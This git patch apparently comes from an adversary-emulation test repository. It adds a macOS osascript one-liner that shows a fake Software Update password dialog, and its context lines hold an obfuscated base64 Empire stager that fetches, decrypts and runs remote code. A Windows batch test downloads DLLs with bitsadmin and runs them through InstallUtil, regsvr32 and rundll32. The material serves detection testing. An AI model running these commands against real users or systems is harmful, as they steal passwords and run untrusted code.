From dce29fd24d13d4e92ba7dbe9ec0d430833869e6b Mon Sep 17 00:00:00 2001
From: atmathis
Date: Fri, 29 Dec 2017 12:12:54 -0500
Subject: [PATCH] Add/Change Mac and All the Things cleanup Created Mac/Credential_Access/Input_Prompt Added AppleScript password prompt to Credential Access/Input Prompt Cleanup Mac/Execution/AppleScript Updated Mac Grid Updated formatting on AllTheThings test.bat
---
 Mac/Credential_Access/Input_Prompt.md | 10 ++++++++++
 Mac/Execution/AppleScript.md | 7 -------
 Mac/README.md | 2 +-
 Windows/Payloads/AllTheThings/test.bat | 3 +++
 4 files changed, 14 insertions(+), 8 deletions(-)
 create mode 100644 Mac/Credential_Access/Input_Prompt.md
diff --git a/Mac/Credential_Access/Input_Prompt.md b/Mac/Credential_Access/Input_Prompt.md
new file mode 100644
index 0000000..b2f7e19
--- /dev/null
+++ b/Mac/Credential_Access/Input_Prompt.md
@@ -0,0 +1,10 @@
+# Input Prompt
+
+MITRE ATT&CK Technique: [T1141](https://attack.mitre.org/wiki/Technique/T1141)
+
+
+### Prompt User for Password (Local Phishing)
+
+ osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
+
+http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
diff --git a/Mac/Execution/AppleScript.md b/Mac/Execution/AppleScript.md
index a8d17b5..7ee3033 100644
--- a/Mac/Execution/AppleScript.md
+++ b/Mac/Execution/AppleScript.md
@@ -9,10 +9,3 @@ MITRE ATT&CK Technique: [T1155](https://attack.mitre.org/wiki/Technique/T1155)
 osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &"" https://github.com/EmpireProject/Empire
-
-
-### Prompt User for Password (Local Phishing)
-
- osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." 
& return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
-
-http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
diff --git a/Mac/README.md b/Mac/README.md
index 0a178e7..edc34f9 100644
--- a/Mac/README.md
+++ b/Mac/README.md
@@ -9,7 +9,7 @@
 | Hidden Files and Directories | Plist Modification | Disabling Security Tools | Credentials in Files | Network Share Discovery | Logon Scripts | Launchctl | Data from Local System | Data Transfer Size Limits | Custom Command and Control Protocol |
 | LC_LOAD_DYLIB Addition | Setuid and Setgid | Exploitation of Vulnerability | Exploitation of Vulnerability | Permission Groups Discovery | Remote File Copy | Scripting | Data from Network Shared Drive | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
 | Launch Agent | Startup Items | File Deletion | Input Capture | Process Discovery | Remote Services | Source | Data from Removable Media | Exfiltration Over Command and Control Channel | Data Encoding |
-| Launch Daemon | Sudo | Gatekeeper Bypass | Input Prompt | Remote System Discovery | Third-party Software | Space after Filename | Input Capture | Exfiltration Over Other Network Medium | Data Obfuscation |
+| Launch Daemon | Sudo | Gatekeeper Bypass | [Input Prompt](Credential_Access/Input_Prompt.md) | Remote System Discovery | Third-party Software | Space after Filename | Input Capture | Exfiltration Over Other Network Medium | Data Obfuscation |
 | Launchctl | Valid Accounts | HISTCONTROL | Keychain | Security Software Discovery | | Third-party Software | Screen Capture | Exfiltration Over Physical Medium | Fallback Channels |
 | Login Item | Web Shell | Hidden Files and Directories | Network Sniffing | System Information Discovery | | Trap | | Scheduled Transfer | Multi-Stage Channels |
 | Logon Scripts | | Hidden Users | Private Keys | System Network Configuration Discovery | | | | | Multiband Communication |
diff --git a/Windows/Payloads/AllTheThings/test.bat b/Windows/Payloads/AllTheThings/test.bat
index 6ccad68..5238501 100755
--- a/Windows/Payloads/AllTheThings/test.bat
+++ b/Windows/Payloads/AllTheThings/test.bat
@@ -5,6 +5,7 @@ bitsadmin.exe /transfer "ATT" https://github.com/redcanaryco/atomic-red-team/raw
 timeout /t 1 /nobreak > NUL
 bitsadmin.exe /transfer "ATT" https://github.com/redcanaryco/atomic-red-team/raw/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll C:\Temp\AllTheThingsx86.dll
 timeout /t 1 /nobreak > NUL
+
 REM X86 Executing X86 AllTheThings Test
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
@@ -13,6 +14,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
 regsvr32.exe /s /u AllTheThingsx86.dll
 regsvr32.exe /s AllTheThingsx86.dll
 rundll32 AllTheThingsx86.dll,EntryPoint
+
 REM AMD64
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
@@ -20,5 +22,6 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dl
 regsvr32.exe /s /u AllTheThingsx64.dll
 regsvr32.exe /s AllTheThingsx64.dll
 rundll32 AllTheThingsx64.dll,EntryPoint
+
 REM Cleanup
 del C:\Temp\AllTheThings*